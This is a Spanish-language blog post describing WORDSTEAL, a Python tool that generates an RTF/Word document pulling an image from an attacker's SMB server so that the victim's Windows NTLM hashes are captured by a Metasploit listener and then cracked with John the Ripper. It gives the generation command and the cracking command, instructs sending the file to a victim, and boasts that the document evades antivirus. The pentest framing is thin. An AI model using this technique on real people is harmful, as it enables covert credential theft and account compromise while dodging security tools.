lunes, 17 de abril de 2017

Roba credenciales de Windows remotamente con documento Word | WORDSTEAL

 

Descripción:

Microsoft Word tiene la capacidad de incluir imágenes de ubicaciones remotas. Esta es una característica indocumentada pero fue encontrada usada por los creadores de malware para incluir imágenes a través de http para las estadísticas. También podemos incluir archivos remotos a un servidor SMB y la víctima se autenticará con sus inicios de sesión cartas credenciales. Esto es muy útil durante un pentest porque le permite robar credenciales sin activar alertas y la mayoría de las aplicaciones de seguridad no detectan esto.
Este script en python nos genera un documento MS Office el cual contendrá una imagen de nuestro servidor, y pondrá a la escucha el modulo de metasploit llamado auxiliary/server/capture/smb que  actúa como un recurso SMB para capturar hashes de contraseñas de usuario para que puedan ser explotados posteriormente.

PoC:

Kali Linux (Atacante)
Windows 10 (Víctima) con MS Office 2007

Desde nuestro Kali Linux clonamos el repositorio
Una vez clonado descargamos una imagen cualquiera y la metemos en la carpeta del repositorio.
Y usamos el comando:
python main.py IPLOCAL IMAGEN.jpg 1
Esto nos generará un archivo RTF (Rich Text Format) y nos pondrá a la escucha el modulo de metasploit auxiliary/server/capture/smb.


El último paso será enviar el archivo RTF a nuestra víctima y al ejecutarlo nos dará los hashes NTML.



Usaremos John para descifrarlos
$ john password_netntlmv2

Como se puede ver en la imagen john tardó 28 minutos en crackear las contraseñas.

Te dejo una web donde puedes comprobar en cuanto tiempo se puede crackear la contraseña que pongas.

Por cierto, el word generado es indetectable por los antivirus. https://nodistribute.com/result/W20PBQ9iFsaTmptXh6udblvoAL

Video:

Previous Post
Next Post

post written by:

0 comentarios: